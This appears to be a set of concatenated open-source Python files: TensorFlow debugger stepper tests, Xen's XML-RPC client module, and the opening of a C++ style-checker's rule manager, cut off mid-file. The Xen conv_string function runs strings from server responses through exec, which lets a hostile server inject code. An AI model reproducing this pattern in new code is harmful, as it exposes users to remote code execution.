self.assertEqual(4, len(stepper.sorted_nodes()))
self.assertSetEqual({"ph0:0", "ph1:0", "x:0", "y:0"},
set(stepper.closure_elements()))
result = stepper.cont(self.x)
self.assertAllClose([[0.0], [5.5]], result)
self.assertEqual({
"ph0:0": NodeStepper.FEED_TYPE_CLIENT,
"ph1:0": NodeStepper.FEED_TYPE_CLIENT,
}, stepper.last_feed_types())
self.assertEqual(["x:0"], stepper.handle_names())
self.assertSetEqual({"x"}, stepper.handle_node_names())
result = stepper.cont(self.y)
self.assertAllClose([[-1.0], [6.0]], result)
self.assertEqual({
"x:0": NodeStepper.FEED_TYPE_HANDLE,
"ph1:0": NodeStepper.FEED_TYPE_CLIENT,
}, stepper.last_feed_types())
def testAttemptToContToPlaceholderWithTensorFeedKeysShouldWork(self):
"""Continuing to a placeholder should be allowed, using client feed."""
ph0_feed = [[1.0, 2.0], [-3.0, 5.0]]
ph1_feed = [[-1.0], [0.5]]
with NodeStepper(
self.sess, self.y, feed_dict={
self.ph0: ph0_feed,
self.ph1: ph1_feed,
}) as stepper:
self.assertAllClose(ph0_feed, stepper.cont(self.ph0))
self.assertEqual({
self.ph0.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
self.assertAllClose(ph1_feed, stepper.cont(self.ph1))
self.assertEqual({
self.ph1.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
ph0_node = self.sess.graph.as_graph_element("ph0")
self.assertAllClose(ph0_feed, stepper.cont(ph0_node))
self.assertEqual({
self.ph0.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
self.assertAllClose([[-1.0], [6.0]], stepper.finalize())
def testAttemptToContToPlaceholderWithTensorNameFeedKeysShouldWork(self):
ph0_feed = [[1.0, 2.0], [-3.0, 5.0]]
ph1_feed = [[-1.0], [0.5]]
with NodeStepper(
self.sess,
self.y,
feed_dict={
self.ph0.name: ph0_feed,
self.ph1.name: ph1_feed,
}) as stepper:
self.assertAllClose(ph0_feed, stepper.cont(self.ph0))
self.assertEqual({
self.ph0.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
self.assertAllClose(ph1_feed, stepper.cont(self.ph1))
self.assertEqual({
self.ph1.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
ph0_node = self.sess.graph.as_graph_element("ph0")
self.assertAllClose(ph0_feed, stepper.cont(ph0_node))
self.assertEqual({
self.ph0.name: NodeStepper.FEED_TYPE_CLIENT
}, stepper.last_feed_types())
self.assertAllClose([[-1.0], [6.0]], stepper.finalize())
class StepperAssignAddTest(test_util.TensorFlowTestCase):
def setUp(self):
self.v = variables.Variable(10.0, name="v")
self.p = math_ops.add(self.v, self.v, name="p")
self.q = math_ops.multiply(self.p, self.p, name="q")
self.delta = constant_op.constant(2.0, name="delta")
self.v_add = state_ops.assign_add(self.v, self.delta, name="v_add")
self.v_add_plus_one = math_ops.add(self.v_add,
1.0,
name="v_add_plus_one")
self.sess = session.Session()
self.sess.run(self.v.initializer)
def tearDown(self):
ops.reset_default_graph()
def testLastUpdatedVariablesReturnsNoneBeforeAnyContCalls(self):
with NodeStepper(self.sess, [self.q, self.v_add]) as stepper:
self.assertIsNone(stepper.last_updated())
def testContToUpdateInvalidatesDumpedIntermedates(self):
with NodeStepper(self.sess, [self.q, self.v_add]) as stepper:
self.assertAllClose(400.0, stepper.cont("q:0"))
self.assertItemsEqual(["v/read:0", "p:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(10.0, stepper.get_tensor_value("v/read:0"))
self.assertAllClose(20.0, stepper.get_tensor_value("p:0"))
self.assertAllClose(
12.0, stepper.cont(
self.v_add, invalidate_from_updated_variables=True))
self.assertAllClose(12.0, self.sess.run(self.v))
self.assertSetEqual({self.v.name}, stepper.last_updated())
self.assertItemsEqual(["v:0"], stepper.dirty_variables())
# Updating the value of v by calling v_add should have invalidated the
# dumped intermediate tensors for v/read:0 and p:0.
self.assertItemsEqual(["delta:0"], stepper.intermediate_tensor_names())
with self.assertRaisesRegexp(
ValueError,
r"This stepper instance does not have access to the value of tensor "
r"\"p:0\""):
stepper.get_tensor_value("p:0")
# The next cont to q should not have used any dumped intermediate tensors
# and its result should reflect the updated value.
self.assertAllClose(576.0, stepper.cont("q:0"))
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual({}, stepper.last_feed_types())
def testOverridingUpstreamTensorInvalidatesDumpedIntermediates(self):
with NodeStepper(self.sess, self.q) as stepper:
self.assertAllClose(400.0, stepper.cont("q:0"))
self.assertItemsEqual(["v/read:0", "p:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(10.0, stepper.get_tensor_value("v/read:0"))
self.assertAllClose(20.0, stepper.get_tensor_value("p:0"))
stepper.override_tensor("v/read:0", 11.0)
self.assertItemsEqual(["v/read:0"], stepper.override_names())
# Overriding the upstream v/read:0 should have invalidated the dumped
# intermediate tensor for the downstream p:0.
self.assertItemsEqual([], stepper.intermediate_tensor_names())
# The next cont to q should not have used any dumped intermediate tensors
# and its result should reflect the overriding value.
self.assertAllClose(484.0, stepper.cont("q:0"))
self.assertEqual({
"v/read:0": NodeStepper.FEED_TYPE_OVERRIDE
}, stepper.last_feed_types())
def testRemovingOverrideToUpstreamTensorInvalidatesDumpedIntermediates(self):
with NodeStepper(self.sess, self.q) as stepper:
stepper.override_tensor("v/read:0", 9.0)
self.assertItemsEqual(["v/read:0"], stepper.override_names())
self.assertAllClose(324.0, stepper.cont(self.q))
self.assertItemsEqual(["p:0"], stepper.intermediate_tensor_names())
stepper.remove_override("v/read:0")
self.assertItemsEqual([], stepper.override_names())
# Removing the pre-existing override to v/read:0 should have invalidated
# the dumped intermediate tensor.
self.assertItemsEqual([], stepper.intermediate_tensor_names())
def testRepeatedCallsToAssignAddDoesNotUpdateVariableAgain(self):
with NodeStepper(self.sess, self.v_add) as stepper:
stepper.cont(self.v_add)
self.assertSetEqual({self.v.name}, stepper.last_updated())
self.assertAllClose(12.0, stepper.cont(self.v))
stepper.cont(self.v_add)
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual({"v_add:0": NodeStepper.FEED_TYPE_HANDLE},
stepper.last_feed_types())
self.assertAllClose(12.0, stepper.cont(self.v))
def testRepeatedCallsToAssignAddDownStreamDoesNotUpdateVariableAgain(self):
with NodeStepper(self.sess, self.v_add_plus_one) as stepper:
stepper.cont(self.v_add_plus_one)
self.assertSetEqual({self.v.name}, stepper.last_updated())
self.assertAllClose(12.0, stepper.cont(self.v))
stepper.cont(self.v_add_plus_one)
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual({"v_add_plus_one:0": NodeStepper.FEED_TYPE_HANDLE},
stepper.last_feed_types())
self.assertAllClose(12.0, stepper.cont(self.v))
class StepperBackwardRunTest(test_util.TensorFlowTestCase):
def setUp(self):
"""Test setup.
Structure of the forward graph:
f
| |
----- -----
| |
d e
| | | |
--- --------- ---
| | |
a b c
Construct a backward graph using the GradientDescentOptimizer.
"""
self.a = variables.Variable(1.0, name="a")
self.b = variables.Variable(2.0, name="b")
self.c = variables.Variable(4.0, name="c")
self.d = math_ops.multiply(self.a, self.b, name="d")
self.e = math_ops.multiply(self.b, self.c, name="e")
self.f = math_ops.multiply(self.d, self.e, name="f")
# Gradient descent optimizer that minimizes g.
gradient_descent.GradientDescentOptimizer(0.01).minimize(
self.f, name="optim")
self.sess = session.Session()
self.sess.run(variables.global_variables_initializer())
def tearDown(self):
ops.reset_default_graph()
def testContToUpdateA(self):
with NodeStepper(self.sess, "optim") as stepper:
result = stepper.cont("a:0")
self.assertAllClose(1.0, result)
self.assertEqual({}, stepper.last_feed_types())
result = stepper.cont("optim/learning_rate:0")
self.assertAllClose(0.01, result)
self.assertEqual({}, stepper.last_feed_types())
# Before any cont calls on ApplyGradientDescent, there should be no
# "dirty" variables.
self.assertEqual(set(), stepper.dirty_variables())
# First, all the two control inputs to optim.
result = stepper.cont("optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=True)
# Now variable a should have been marked as dirty due to the update
# by optim/update_a/ApplyGradientDescent.
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual({"a:0"}, stepper.dirty_variables())
self.assertIsNone(result)
self.assertEqual({
"optim/learning_rate:0": NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
# Check that Variable "a" has been updated properly, but "b", "c" and "d"
# remain the same.
# For backprop on Variable a:
# Because f = a * b * b * c, df / da = b * b * c.
# 1.0 - learning_rate * b * b * c
# = 1.0 - 0.01 * 2.0 * 2.0 * 4.0 = 0.84.
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(2.0, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testContToUpdateB(self):
with NodeStepper(self.sess, "optim") as stepper:
result = stepper.cont("optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=True)
self.assertIsNone(result)
self.assertSetEqual({"b:0"}, stepper.last_updated())
self.assertEqual(set(["b:0"]), stepper.dirty_variables())
# For backprop on Variable b:
# Because f = a * b * b * c, df / da = 2 * a * b * c.
# 2.0 - learning_rate * 2 * a * b * c
# = 2.0 - 0.01 * 2 * 1.0 * 2.0 * 4.0 = 1.84
self.assertAllClose(1.0, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testContAfterUpdateWithoutRestoringVariableValue(self):
with NodeStepper(self.sess, "optim") as stepper:
# First, update Variable a from 1.0 to 0.84.
result = stepper.cont(
"optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual(set(["a:0"]), stepper.dirty_variables())
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(2.0, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
# Tracking of the updated variables should have invalidated all
# intermediate tensors downstream to a:0.
self.assertNotIn("a/read:0", stepper.intermediate_tensor_names())
self.assertNotIn("d:0", stepper.intermediate_tensor_names())
# Second, update Variable b without the default restore_variable_values.
result = stepper.cont(
"optim/update_b/ApplyGradientDescent", restore_variable_values=False)
self.assertIsNone(result)
# For the backprop on Variable b under the updated value of a:
# 2.0 - learning_rate * 2 * a' * b * c
# = 2.0 - 0.01 * 2 * 0.84 * 2.0 * 4.0 = 1.8656
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(1.8656, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testContNotInvalidatingFromVariableUpdatesWorksForNextUpdate(self):
with NodeStepper(self.sess, "optim") as stepper:
self.assertIsNone(stepper.cont(
"optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=False))
# Even though invalidate_from_updated_variables is set to False, dirty
# variables should still have been tracked.
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual({"a:0"}, stepper.dirty_variables())
self.assertIn("a/read:0", stepper.intermediate_tensor_names())
self.assertIn("b/read:0", stepper.intermediate_tensor_names())
self.assertIn("c/read:0", stepper.intermediate_tensor_names())
self.assertIn("d:0", stepper.intermediate_tensor_names())
self.assertIn("e:0", stepper.intermediate_tensor_names())
self.assertIn("optim/learning_rate:0",
stepper.intermediate_tensor_names())
self.assertNotIn("a:0", stepper.intermediate_tensor_names())
self.assertNotIn("b:0", stepper.intermediate_tensor_names())
self.assertNotIn("c:0", stepper.intermediate_tensor_names())
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(2.0, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
# For the backprop on Variable b, the result should reflect the original
# value of Variable a, even though Variable a has actually been updated.
# 2.0 - learning_rate * 2 * a * b * c
# = 2.0 - 0.01 * 2 * 1.0 * 2.0 * 4.0 = 1.84
self.assertIsNone(stepper.cont(
"optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=False,
restore_variable_values=False))
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testUpdateTwiceRestoreVariable(self):
with NodeStepper(self.sess, "optim") as stepper:
result = stepper.cont(
"optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual({"a:0"}, stepper.dirty_variables())
result = stepper.cont(
"optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
# Variables a and c should have been restored and hence no longer dirty.
# Variable b should have been marked as dirty.
self.assertSetEqual({"b:0"}, stepper.last_updated())
self.assertEqual({"b:0"}, stepper.dirty_variables())
# The result of the update should be identitcal to as if only update_b is
# run.
self.assertAllClose(1.0, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testSelectiveHandleUsageDependingOnTransitiveCleanliness(self):
"""Test tensor handlers are using only during clean transitive closure.
"clean" means no Variables have been updated by preceding cont() calls.
"""
with NodeStepper(self.sess, "optim") as stepper:
# First, call cont() on the two tensors on the intermediate level: e and
# f.
result = stepper.cont("d:0")
self.assertAllClose(2.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertItemsEqual(["d:0"], stepper.handle_names())
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual(set(), stepper.dirty_variables())
result = stepper.cont("e:0")
self.assertAllClose(8.0, result)
self.assertEqual({
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
self.assertItemsEqual(["d:0", "e:0"], stepper.handle_names())
self.assertItemsEqual(["a/read:0", "b/read:0", "c/read:0"],
stepper.intermediate_tensor_names())
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual(set(), stepper.dirty_variables())
# Now run update_a, so as to let Variable a be dirty.
result = stepper.cont(
"optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
# Due to the update to the value of a:0, the dumped intermediate a/read:0
# should have been invalidated.
self.assertNotIn("a/read:0", stepper.intermediate_tensor_names())
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual({"a:0"}, stepper.dirty_variables())
# Now, run update_b.
result = stepper.cont(
"optim/update_b/ApplyGradientDescent", restore_variable_values=True)
self.assertIsNone(result)
# The last cont() run should have use the handle of tensor e, but not the
# handle of tensor d, because the transitive closure of e is clean,
# whereas that of d is dirty due to the update to a in the previous cont()
# call.
last_feed_types = stepper.last_feed_types()
self.assertNotIn("d:0", last_feed_types)
self.assertEqual(NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
last_feed_types["b/read:0"])
self.assertEqual(NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
last_feed_types["c/read:0"])
# The result of the update_b should be identical to as if no other
# update_* cont() calls have occurred before.
self.assertAllClose(1.0, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testRestoreVariableValues(self):
"""Test restore_variable_values() restores the old values of variables."""
with NodeStepper(self.sess, "optim") as stepper:
stepper.cont(
"optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertAllClose(1.84, self.sess.run(self.b))
stepper.restore_variable_values()
self.assertAllClose(2.0, self.sess.run(self.b))
def testFinalize(self):
"""Test finalize() to restore variables and run the original fetch."""
with NodeStepper(self.sess, "optim") as stepper:
# Invoke update_b before calling finalize.
stepper.cont(
"optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
result = stepper.finalize()
self.assertIsNone(result)
# The results of the Variable updates should be the same as if no cont()
# call has occurred on update_b.
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(3.96, self.sess.run(self.c))
def testOverrideThenContToUpdateThenRemoveOverrideThenUpdateAgain(self):
"""Test cont() to update nodes after overriding tensor values."""
with NodeStepper(self.sess, "optim") as stepper:
result = stepper.cont("d:0")
self.assertAllClose(2.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual(set(), stepper.dirty_variables())
self.assertEqual(["d:0"], stepper.handle_names())
self.assertSetEqual({"d"}, stepper.handle_node_names())
# Override the value from 1.0 to 10.0.
stepper.override_tensor("a/read:0", 10.0)
self.assertEqual(["a/read:0"], stepper.override_names())
result = stepper.cont(
"optim/update_c/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
# The last cont() call should have not used the tensor handle to d:0,
# because the transitive closure of d:0 contains an override tensor.
self.assertEqual({
"a/read:0": NodeStepper.FEED_TYPE_OVERRIDE,
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
# The tensor handle to d:0 should have been removed due to the dirty
# transitive closure.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
# For this backprop on c, the overriding value of a/read:0 should have
# been used:
# 4.0 - learning_rate * a * b * b
# = 4.0 - 0.01 * 10.0 * 2.0 * 2.0 = 3.6.
self.assertAllClose(3.6, self.sess.run(self.c))
# Now remove the overriding value of a/read:0.
stepper.remove_override("a/read:0")
self.assertEqual([], stepper.override_names())
# Obtain the tensor handle to d:0 again.
result = stepper.cont("d:0")
self.assertAllClose(2.0, result)
self.assertEqual(["d:0"], stepper.handle_names())
self.assertSetEqual({"d"}, stepper.handle_node_names())
self.assertNotIn("a/read:0", stepper.last_feed_types())
# Then call update_c again, without restoring c.
result = stepper.cont("optim/update_c/ApplyGradientDescent",
restore_variable_values=False)
self.assertIsNone(result)
self.assertNotIn("a/read:0", stepper.last_feed_types())
# This time, the d:0 tensor handle should have been used, because its
# transitive closure is clean.
self.assertEqual({
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
"d:0": NodeStepper.FEED_TYPE_HANDLE,
"optim/learning_rate:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
# For this backprop on c, the overriding value of a/read:0 should have
# been used:
# 3.6 - learning_rate * a * b * b
# = 3.6 - 0.01 * 1.0 * 2.0 * 2.0 = 3.56.
self.assertAllClose(3.56, self.sess.run(self.c))
def testContToNodeWithOutputTensors(self):
"""cont() to an op should cache its output tensors if appropriate."""
with NodeStepper(self.sess, "optim") as stepper:
# In the transitive closure of the stepper, look for an op of which the
# output tensor also is in the transitive closure.
# Do not assume a specific op, e.g., ""gradients/e_grad/Reshape_1",
# because it may vary between builds.
closure_elements = stepper.closure_elements()
op_with_output_in_closure = None
for element_name in closure_elements:
if element_name + ":0" in closure_elements:
op_with_output_in_closure = str(element_name)
break
self.assertEqual(
[0], stepper.output_slots_in_closure(op_with_output_in_closure))
self.assertIsNotNone(op_with_output_in_closure)
output_tensor = op_with_output_in_closure + ":0"
# The op "gradients/?_grad/Reshape_1" is in the transitive closure of the
# stepper, because it is the control input to another o. However, its
# output tensor "gradients/?_grad/Reshape_1:0" is also in the transitive
# closure, because it is the (non-control) input of certain ops. Calling
# cont() on the op should lead to the caching of the tensor handle for
# the output tensor.
stepper.cont(op_with_output_in_closure)
self.assertEqual([output_tensor], stepper.handle_names())
self.assertSetEqual({op_with_output_in_closure},
stepper.handle_node_names())
# Do a cont() call that uses the cached tensor of
# "gradients/?_grad/Reshape_1:0".
stepper.cont(output_tensor)
self.assertEqual({
output_tensor: NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
if __name__ == "__main__":
googletest.main()
| wangyum/tensorflow | tensorflow/python/debug/lib/stepper_test.py | Python | apache-2.0 | 45,190 |
#============================================================================
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#============================================================================
# Copyright (C) 2006 Anthony Liguori <[email protected]>
# Copyright (C) 2007 XenSource Inc.
#============================================================================
from httplib import FakeSocket, HTTPConnection, HTTP
import socket
import string
import xmlrpclib
from types import StringTypes
from sys import hexversion
try:
import SSHTransport
ssh_enabled = True
except ImportError:
# SSHTransport is disabled on Python <2.4, because it uses the subprocess
# package.
ssh_enabled = False
# A new ServerProxy that also supports httpu urls. An http URL comes in the
# form:
#
# httpu:///absolute/path/to/socket.sock
#
# It assumes that the RPC handler is /RPC2. This probably needs to be improved
class HTTPUnixConnection(HTTPConnection):
def connect(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.host)
class HTTPUnix(HTTP):
_connection_class = HTTPUnixConnection
class UnixTransport(xmlrpclib.Transport):
def request(self, host, handler, request_body, verbose=0):
self.__handler = handler
return xmlrpclib.Transport.request(self, host, '/RPC2',
request_body, verbose)
def make_connection(self, host):
if hexversion < 0x02070000:
# python 2.6 or earlier
return HTTPUnix(self.__handler)
else:
# xmlrpclib.Transport changed in python 2.7
return HTTPUnixConnection(self.__handler)
# We need our own transport for HTTPS, because xmlrpclib.SafeTransport is
# broken -- it does not handle ERROR_ZERO_RETURN properly.
class HTTPSTransport(xmlrpclib.SafeTransport):
def _parse_response(self, file, sock):
p, u = self.getparser()
while 1:
try:
if sock:
response = sock.recv(1024)
else:
response = file.read(1024)
except socket.sslerror, exn:
if exn[0] == socket.SSL_ERROR_ZERO_RETURN:
break
raise
if not response:
break
if self.verbose:
print 'body:', repr(response)
p.feed(response)
file.close()
p.close()
return u.close()
# See xmlrpclib2.TCPXMLRPCServer._marshalled_dispatch.
def conv_string(x):
if isinstance(x, StringTypes):
s = string.replace(x, "'", r"\047")
exec "s = '" + s + "'"
return s
else:
return x
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, transport=None, encoding=None, verbose=0,
allow_none=1):
if transport == None:
(protocol, rest) = uri.split(':', 1)
if protocol == 'httpu':
uri = 'http:' + rest
transport = UnixTransport()
elif protocol == 'https':
transport = HTTPSTransport()
elif protocol == 'ssh':
global ssh_enabled
if ssh_enabled:
(transport, uri) = SSHTransport.getHTTPURI(uri)
else:
raise ValueError(
"SSH transport not supported on Python <2.4.")
xmlrpclib.ServerProxy.__init__(self, uri, transport, encoding,
verbose, allow_none)
def __request(self, methodname, params):
response = xmlrpclib.ServerProxy.__request(self, methodname, params)
if isinstance(response, tuple):
return tuple([conv_string(x) for x in response])
else:
return conv_string(response)
| flexiant/xen | tools/python/xen/util/xmlrpcclient.py | Python | gpl-2.0 | 4,533 |
# Copyright (c) 2009 NHN Inc. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of NHN Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os #@UnusedImport
import sys #@UnusedImport
import sre_compile
from nsiqcppstyle_util import * #@UnusedWildImport
class RuleManager :
def __init__(self, runtimePath) :
self.availRuleNames = []
basePath = os.path.join(runtimePath, "rules")
ruleFiles = os.listdir(basePath)
rulePattern = sre_compile.compile("^(.*)\.py$")
for eachRuleFile in ruleFiles :
if os.path.isfile(os.path.join(basePath, eachRuleFile)) :
ruleMatch = rulePattern.match(eachRuleFile)
if ruleMatch != None and eachRuleFile.find("__init__") == -1 :
ruleName = ruleMatch.group(1)
self.availRuleNames.append(ruleName)
self.availRuleCount = len(self.availRuleNames)
self.availRuleModules = {}
self.loadedRule = []
self.rules = []
self.preprocessRules = []
self.functionNameRules = []
self.functionScopeRules = []
self.typeNameRules = []
self.typeScopeRules = []
self.lineRules = []
self.fileEndRules = []
self.fileStartRules = []
self.projectRules = []
self.rollBackImporter = None
# self.LoadAllRules()
def LoadRules(self, checkingRuleNames, printRule = True):
"""
Load Rules. It resets rule before loading rules
"""
self.ResetRules()
self.ResetRegisteredRules()
if self.rollBackImporter != None :
self.rollBackImporter.uninstall()
self.rollBackImporter = RollbackImporter()
if printRule :
print "======================================================================================"
for ruleName in checkingRuleNames :
count = self.availRuleNames.count(ruleName)
if count == 0 :
print "%s does not exist or incompatible." % ruleName
continue
else :
if printRule :
print " - ", ruleName, "is applied."
ruleModule = __import__("rules."+ruleName)
self.loadedRule.append(ruleModule)
if len(self.loadedRule) == 0 :
print " No Rule is specified. Please configure rules in filefilter.txt."
if printRule :
print "======================================================================================"
def ResetRules(self):
self.loadedRule = []
############################################################################
# Rule Runner
############################################################################
def RunPreprocessRule(self, lexer, contextStack):
""" Run rules which runs in the preprecessor blocks """
for preprocessRule in self.preprocessRules :
data = lexer.Backup()
preprocessRule(lexer, contextStack)
lexer.Restore(data)
def RunFunctionNameRule(self, lexer, functionFullName, decl, contextStack, functionContext) :
""" Run rules which runs on the function name """
for eachFunctionNameRule in self.functionNameRules :
data = lexer.Backup()
eachFunctionNameRule(lexer, functionFullName, decl, contextStack, functionContext)
lexer.Restore(data)
def RunFunctionScopeRule(self, lexer, contextStack):
""" Run rules which runs in the function blocks """
for eachFunctionScopeRule in self.functionScopeRules :
data = lexer.Backup()
eachFunctionScopeRule(lexer, contextStack)
lexer.Restore(data)
def RunTypeNameRule(self, lexer, typeName, typeFullName, decl, contextStack, typeContext):
""" Run rules which runs on the type names """
for typeNameRule in self.typeNameRules :
data = lexer.Backup()
typeNameRule(lexer, typeName, typeFullName, decl, contextStack, typeContext)
lexer.Restore(data)
def RunTypeScopeRule(self, lexer, contextStack):
""" Run rules which runs in the type blocks """
for typeScopeRule in self.typeScopeRules :
data = lexer.Backup()
typeScopeRule(lexer, contextStack)
lexer.Restore(data)
def RunRule(self, lexer, contextStack):
""" Run rules which runs in any tokens """
for rule in self.rules :
data = lexer.Backup()
rule(lexer, contextStack)
lexer.Restore(data)
def RunLineRule(self, lexer, line, lineno):
""" Run rules which runs in each lines. """
for lineRule in self.lineRules :
data = lexer.Backup()
lineRule(lexer, line, lineno)
lexer.Restore(data)
def RunFileEndRule(self, lexer, filename, dirname):
""" Run rules which runs at the end of files. """
for fileEndRule in self.fileEndRules :
data = lexer.Backup()
fileEndRule(lexer, filename, dirname)
lexer.Restore(data)
def RunFileStartRule(self, lexer, filename, dirname):
""" Run rules which runs at the start of files. """
for fileStartRule in self.fileStartRules :
data = lexer.Backup()
fileStartRule(lexer, filename, dirname)
lexer.Restore(data)
def RunProjectRules(self, targetName):
""" Run rules which runs once a project. """
for projectRule in self.projectRules :
projectRule(targetName)
############################################################################
# Rule Resister Methods
############################################################################
def ResetRegisteredRules(self):
""" Reset all registered rules. """
del self.functionNameRules[:]
del self.functionScopeRules[:]
del self.lineRules[:]
del self.rules[:]
del self.typeNameRules[:]
del self.typeScopeRules[:]
del self.fileStartRules[:]
del self.fileEndRules[:]
del self.projectRules[:]
del self.preprocessRules[:]
def AddPreprocessRule(self, preprocessRule):
""" Add rule which runs in preprocess statements """
self.preprocessRules.append(preprocessRule)
def AddFunctionScopeRule(self, functionScopeRule):
""" Add rule which runs in function scope """
self.functionScopeRules.append(functionScopeRule)
def AddFunctionNameRule(self, functionRule):
""" Add rule on the function name place"""
self.functionNameRules.append(functionRule)
def AddLineRule(self, lineRule):
""" Add rule on the each line """
self.lineRules.append(lineRule)
def AddRule(self, rule):
""" Add rule on any token """
self.rules.append(rule)
def AddTypeNameRule(self, typeNameRule):
""" Add rule on any type (class / struct / union / namesapce / enum) """
self.typeNameRules.append(typeNameRule)
def AddTypeScopeRule(self, typeScopeRule):
""" Add rule on the any type definition scope """
self.typeScopeRules.append(typeScopeRule)
def AddFileEndRule(self, fileEndRule):
"""
Add rule on the file end
Added Rule should be function with following prototype "def RunRule(lexer, filename, dirname)"
lexer is the lexer used to analyze the source. it points the end token of source.
filename is the filename analyzed.
dirname is the file directory.
"""
self.fileEndRules.append(fileEndRule)
def AddFileStartRule(self, fileStartRule):
"""
Add rule on the file start
Added Rule should be function with following prototype "def RunRule(lexer, filename, dirname)"
